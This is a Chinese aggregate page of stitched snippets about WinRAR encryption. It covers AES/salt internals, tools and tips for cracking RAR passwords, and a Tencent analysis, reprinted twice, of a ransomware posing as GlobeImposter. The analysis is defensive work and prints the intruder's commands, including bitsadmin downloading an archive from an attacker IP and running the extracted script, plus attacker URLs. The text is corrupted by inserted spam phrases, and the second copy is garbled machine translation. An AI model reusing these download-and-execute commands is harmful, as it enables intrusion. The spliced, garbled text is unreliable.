精华内容
下载资源
问答
  • 2018-09-07 09:59:58


    右击选择添加到压缩文件,



    806983cc2b7c61694f471ea9efeeff5eeff5377e

    更多相关内容
  • 除了用来压缩文件,我们还常常把WinRAR当作一个加密软件来使用,在压缩文件的时候设置一个密码就可以达到保护数据的目的了。正因为如此,专门针对WinRAR密码的破解...那么,怎样才可以让WinRAR加密的文件牢不可破呢?
  • 不要密码,直接提取WINRAR加密文件,分为几种方式,一般都能破解。
  • 调用WinRAR加密压缩多个文件
  • 无需密码-直接提取WINRAR加密文件
  • 主要介绍了C#中使用WinRAR实现加密压缩及解压缩文件,本文直接给出实例代码,代码中包含详细注释,需要的朋友可以参考下
  • winrar加密分析

    千次阅读 2010-12-11 17:49:00
    【原创】winrar加密分析标 题: winrar加密分析 作 者:天易love 时 间: 2009-10-02,06:33:10 链 接: http://bbs.pediy.com/showthread.php?t=98812<br /><br />条件限制,用非智能手机发的,因而无法...
    【原创】winrar加密分析
    天易love 当前在线

    标 题: winrar加密分析
    作 者: 天易love
    时 间: 2009-10-02,06:33:10
    链 接: http://bbs.pediy.com/showthread.php?t=98812

    条件限制,用非智能手机发的,因而无法图文并貌,请大家包涵。
    一、加密文件大体结构:
        1、只加密文件内容时。偏移14-15h是对其后一直到文件头结束处也就是加密数据开始处的校验值。文件头中文件名后至文件头结束处是八字节的salt和5字节的未知区域(功能暂不详),加密数据后紧跟固定的结束字符串c4 3d 7b 00 40 07 00。
        2、头和内容均加密时:偏移14-15h是salt2,尾部还出现一次。紧跟的是加密的文件头(头中尾部是salt1和5字节的未知区域)和加密的文件内容(压缩后再进行aes加密),最后就是salt2和经过aes加密的固定结束字符串。注:生成salt的函数调用了2次。

        二、简述salt算法:
         1、由SystemTime得到FileTime;
            2、分别对FileTime的两个DWORD进行hash_process;
         3、hash_final后得到的digest的最前面的两个DWORD就是salt。
    三、加密过程:
        1、先将salt接在unicode形式的密码后再用hash_final生成aesinit、aeskey、10轮round key。
       2、压缩好的文件内容分组长为每一个分组128bit,开始加密前先与前一个分组xor生成一个state参与aes加密,第一个分组与aesinit进行xor。
        四、隐患:
        由于salt是随机产生,因而aeskey和round key也是随机的,文件加密结果就是随机的。这个变量的使用给我们提供了利用空间。插一句,假如由加密后数据逆推得到aeskey但由于是经过hash得到,这是不可逆的,所以不可能知道密码。唯一可行就是让其加密过程中自己将密码保存到salt处最好用可逆向的加密算法处理一下,这不会有任何影响,只是让它多了层含义。
       以上是我的一点肤浅的认识,望批评指正!
     天易love
     2009-10-2
    展开全文
  • 当一个非常重要的RAR文件因为忘记密码无法解压缩时,你是不是就这样抛弃它了呢?当然不是,你可以使用RAR Password Cracker这个软将加密的RAR文件破解出来。本文将为大家介绍如何强行破解加密WinRAR文件。
  • 完美破解winrar加密的软件完美破解winrar加密的软件完美破解winrar加密的软件
  • 令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急...

    近日,腾讯安全御见威胁情报中心发现假冒GlobeImposter勒索病毒正在传播,攻击者疑通过MS SQL爆破入侵服务器,通过网络下载恶意脚本代码,继而执行加密和勒索流程。

    令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急着缴纳赎金。该病毒加密压缩的密码明文写在病毒配置信息中,使用这个密码解压缩,文件就能完全恢复。

    分析

    被勒索服务器疑似被通过MSSQL爆破入侵成功,之后执行以下相关命令行进一步下载执行恶意代码:PHP大马

    1)bitsadmin  /transfer n hxxp://47.92.55[.]239/s/jr26.rar C:/Progra~1/jr26.rar

    2)C:\Windows\system32\cmd.exe /c C:\Progra~1\winrar\rar.exe e -pp.5p C:\Progra~1\jr26.rar

    3)C:\Windows\system32\cmd.exe /c C:\Progra~1\jr26.cmd

    jr26.rar为一个带密码的压缩包,密码为p.5p

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    jr26.rar解压后可得到一个疑似乱码的脚本文件

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    16进制查看可发现貌似多了0xFF 0xFE 0x0D 0x0A,目测应该是以二进制形式写入的标志,导致文本类识别工具无法查看

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    去掉0xFF 0xFE 0x0D 0x0A后尝试再次打开,脚本内容已可以正常查看

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    查看脚本内容可知,主要目的为将指定类型的文件根据后缀分类,分别使用winrar进行加密压缩(通过上图的命令行参数,我们看到加密密码为lll.hc3t6b9s8kz5r26),文件将被压缩至根目录下对应的不同文件名(邮箱.ch_文件后缀类型.随机数字tiger88818)包内,同时删除原始文件。

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    如下图Decryptcn@protonmail.ch_bax.32419tiger88818包内,则被带密码压缩了所有bak类型的文件

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

    同时,为了防止加密压缩时,数据库文件被占用导致加密中止,病毒还会结束大量的数据库服务相关进程。

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    最奇葩的来了,加密文件完成后,病毒会通过远程下载一个勒索说明文档

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    打开说明文档,竟然是知名勒索病毒GlobeImposter的修改版本,该病毒作者只是修改了联系邮箱。奇热影视

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

     

    进一步观察病毒使用的url可发现攻击者使用的多个文件,分别有勒索说明文档(HOW_TO_BACK_YOUR_FILE*),勒索脚本包(jr26.rar),正规的winrar压缩模块(Rar.exe),猜测为扫描器相关模块包(带未知密码的s.rar包),且病毒使用服务部署在某知名云平台服务器上。

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

     

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    腾讯安全提醒大家,针对此病毒,可以不必着急缴纳赎金,可尝试使用Winrar打开根目录中的*tiger88818后缀文件,然后选择使用密码(lll.hc3t6b9s8kz5r26)解压到指定位置,即可恢复文件。

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

     

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

    安全建议

    企业用户:

    1、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆;

    2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问;

    3、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理;

    4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器;

    5、对重要文件和数据(数据库等数据)进行定期非本地备份;

    6、教育终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码;

    7、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务;

    WinRAR加密压缩冒充GlobeImposter勒索病毒 安全专家轻松解密

     

    8、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。

    个人用户:

    1、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码;

    2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。

    IOCs

    MD5:

    36e826b4a06dcbf039fb8fd6aeca4836

    e9613db5620dbcb56903b98532971582

    f18b3b2dc6556d60663d70ac411c0ac8

    URL
    hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILES.txt
    hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILESxx.rar
    hxxp://47.92.55.239/s/jr26.rar
    hxxp://47.92.55.239/s/Rar.exe
    hxxp://47.92.55.239/s/s.rar

    展开全文
  • 最近,腾讯安全威胁情报中心发现假的GlobeImposter... 它仅使用WinRAR加密和压缩用户文件,然后修改GlobeImposter勒索软件电子邮件以威胁用户,然后与他们联系以通过电子邮件索取奖励. 腾讯安全提醒所有人,如果遇...

    最近,腾讯安全威胁情报中心发现假的GlobeImposter勒索软件病毒正在传播. 攻击者涉嫌通过MS SQL入侵服务器,通过网络下载恶意脚本代码,然后执行加密和勒索软件过程.

    令人惊讶的是,这种所谓的“勒索软件”执行起来非常简单. 它仅使用WinRAR加密和压缩用户文件,然后修改GlobeImposter勒索软件电子邮件以威胁用户,然后与他们联系以通过电子邮件索取奖励. 腾讯安全提醒所有人,如果遇到此病毒,请不要急于支付赎金. 病毒加密和压缩的密码以纯文本形式写入病毒配置信息中. 使用此密码解压缩,文件即可完全恢复.

    分析

    涉嫌勒索的服务器被怀疑已通过MSSQL成功被黑客入侵,然后执行以下相关命令行以下载并执行恶意代码:

    1)bitsadmin / transfer n hxxp: //47.92.55 [. ] 239 / s / jr26.rar C: /Progra~1/jr26.rar

    2)C: \ Windows \ system32 \ cmd.exe / c C: \ Progra〜1 \ winrar \ rar.exe e -pp.5p C: \ Progra〜1 \ jr26.rar

    3)C: \ Windows \ system32 \ cmd.exe / c C: \ Progra〜1 \ jr26.cmd

    jr26.rar是一个带有密码的压缩包,密码为p.5p

    将jr26.rar解压缩后,可以获得脚本文件,其中包含可疑的乱码.

    检查十六进制系统,您可以发现似乎还有更多0xFF 0xFE 0x0D 0x0A. 外观检查应该是二进制形式的标志,这会使文本识别工具无法查看

    删除0xFF 0xFE 0x0D 0x0A并尝试再次打开它,脚本内容就可以正常查看

    检查脚本的内容,主要目的是根据后缀对指定类型的文件进行分类,并使用winrar对其进行加密和压缩(通过上图中的命令行参数winrar压缩包解密,我们看到了加密密码为lll.hc3t6b9s8kz5r26),文件将被压缩. 转到根目录下相应的其他文件名(mailbox.ch_file后缀类型. 随机数tiger88818),并同时删除原始文件.

    如下图所示,在[emailprotected] _bax.32419tiger88818程序包中,所有bak类型文件都使用密码压缩

    同时,为了防止在加密和压缩过程中占用文件,加密将停止,并且该病毒还将结束大量与服务有关的进程.

    最奇怪的事情在这里. 加密文件完成后,病毒将远程下载赎金记录文档

    打开说明文档,结果证明它是众所周知的勒索软件GlobeImposter的修改版本. 病毒作者仅修改了联系人电子邮件.

    进一步观察病毒使用的URL,可以发现攻击者使用的多个文件,包括勒索记录(HOW_TO_BACK_YOUR_FILE *),勒索脚本包(jr26.rar),常规winrar压缩模块(Rar.exe),猜测是与扫描仪相关的模块软件包(密码未知的s.rar软件包),该病毒服务已部署在知名的云平台服务器上.

    腾讯安全提醒所有人,对于这种病毒,您无需着急支付赎金. 您可以尝试使用Winrar在根目录中打开* tiger88818后缀文件,然后选择使用密码(lll.hc3t6b9s8kz5r26)将其解压缩到指定位置以恢复该文件.

    安全建议

    1. 尝试关闭不必要的端口,例如: 445、135、139等,端口3389、5900等的白名单配置,并且仅允许白名单中的IP连接登录;

    2. 尽可能关闭不必要的文件共享. 如有必要,请使用ACL和强大的密码保护来限制访问权限,并禁用对共享文件夹的匿名访问;

    3. 使用强密码,避免使用弱密码,并定期更改密码. 建议对服务器密码使用强密码和不规则密码winrar压缩包解密,并且必须对每个服务器要求不同的密码管理;

    4. 为服务器/工作站的内部访问设置相应的控件,而无需互连要求,以防止外部网络服务器作为跳板受到攻击,从而进一步攻击其他服务器;

    5. 对重要文件和数据(和其他数据)进行定期的非本地备份;

    6. 教育终端用户在将附件下载到不熟悉的电子邮件时要格外小心,如果没有必要,则应禁止启用Office宏代码;

    7. 在终端/服务器上部署的安全保护软件,并考虑在具有安全保护功能的腾讯云和其他云服务上部署Web服务器;

    8. 建议在整个网络上安装玉电终端安全管理系统(). 御店终端安全管理系统具有全面的安全管理功能,如统一的终端防病毒管理,漏洞修复的统一管理和控制,以及战略管理和控制等,可以帮助企业管理者充分了解和管理企业内部网的安全状况,保护企业. 安全.

    1. 启用腾讯计算机管理器,不要随意打开陌生的电子邮件,关闭Office来执行宏代码;

    2. 打开计算机管理器的文档保护功能,然后使用冗余磁盘空间自动备份数据文件. 即使发生事故,也可以准备数据.

    IOC

    36e826b4a06dcbf039fb8fd6aeca4836

    e9613db5620dbcb56903b98532971582

    f18b3b2dc6556d60663d70a11c0ac8

    URL:

    hxxp: //47.92.55.239/s/HOW_TO_BACK_YOUR_FILES.txt

    hxxp: //47.92.55.239/s/HOW_TO_BACK_YOUR_FILESxx.rar

    hxxp: //47.92.55.239/s/jr26.rar

    hxxp: //47.92.55.239/s/Rar.exe

    hxxp: //47.92.55.239/s/s.rar

    本文来自电脑杂谈,转载请注明本文网址:

    http://www.pc-fly.com/a/ruanjian/article-284964-1.html

    展开全文
  • 破解zip,WinRaR等压缩包加密

    千次阅读 2020-10-14 16:58:08
    有时候我们下载网上的压缩包,压缩包被别人加密了,这时候,我们可以使用下面的方式进行破解(命令解压) 这里我推荐使用7z,7z很强大,而且免费开源。https://www.7-zip.org/download.html下载安装文件exe ...
  • 当一个非常重要的RAR文件因为忘记密码无法解压缩时,可以使用RAR Password Cracker这个软将加密的RAR文件破解出来。文中介绍了使用RAR Password Cracker Wizard强行破解加密WinRAR文件的方法。
  • WINRAR 日文版

    2012-10-15 19:37:07
    日文winrar3.7版本 压缩工具 100%好用。内有说明,和破解文件。 在日文系统上用,效果最好。
  • winrar解密

    2019-02-15 00:56:58
    适用于忘记了密码的童孩,破解速度看你的CPU运行速度。太复杂的破解不了。
  • VB6利用WinRAR进行压缩解压,支持加密
  • # winRAR 5 加密的文件 用什么软件破解???跪求大神.... 我这边使用WinRAR 5版本对自己的文件进行加密,但是这段时间想起要用的时候忘记了密码,在网上查询了破解软件:RAR password unlocker 5.0和ARCHPR ...
  • NULL 博文链接:https://wangleide414.iteye.com/blog/379275
  • WinRAR密码探索器,用于解密WinRAR5,RAR4最新版压缩格式密码,附带密码字典生成器和RAR探索器,里面附带示例,解密时间周期根据实际密码长度和你所生成的字典复杂度决定。 工具仅供用于学习交流,解决自己忘记密码...
  • WinRAR给文件加密教程.docx
  • WINRAR压缩加密

    2013-07-16 22:07:08
    WINRAR压缩加密
  • winrar“秒破”尝试与原理简介

    千次阅读 2019-06-09 16:18:10
    实例二的做法,我猜是因为加密过程是16字节为一组,加密后的内容也应该是16字节的倍数,所以解密时也以16字节为单位读取,当文件内容最后跟着一段小于16字节的数据时,WINRAR解密时直接无视这段数据。于是就可以把...
  • 视频加密一机一码,图片加密U盘加密软件,软件加密软件,压缩包加密软件
  • matlab加密代码WinRAR集成到Matlab中 在Matlab中以编程方式使用WinRAR 5.0+压缩/解压缩存档文件的脚本。 这些脚本不能替代官方WinRAR软件,因为RAR.m和UNRAR.m都调用官方WinRAR客户端的可执行文件以起作用。 有关...
  • 马上进行压缩,最方便的就是直接使用SQL命令执行压缩,由于WinRAR可以通过命令行调用,所以我们可以使用SQL Server中的xp_cmdshell命令来执行压缩指令,同时通过其中的一些参数指定压缩密码,这样加密压缩就实现了。...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 4,499
精华内容 1,799
关键字:

winrar如何加密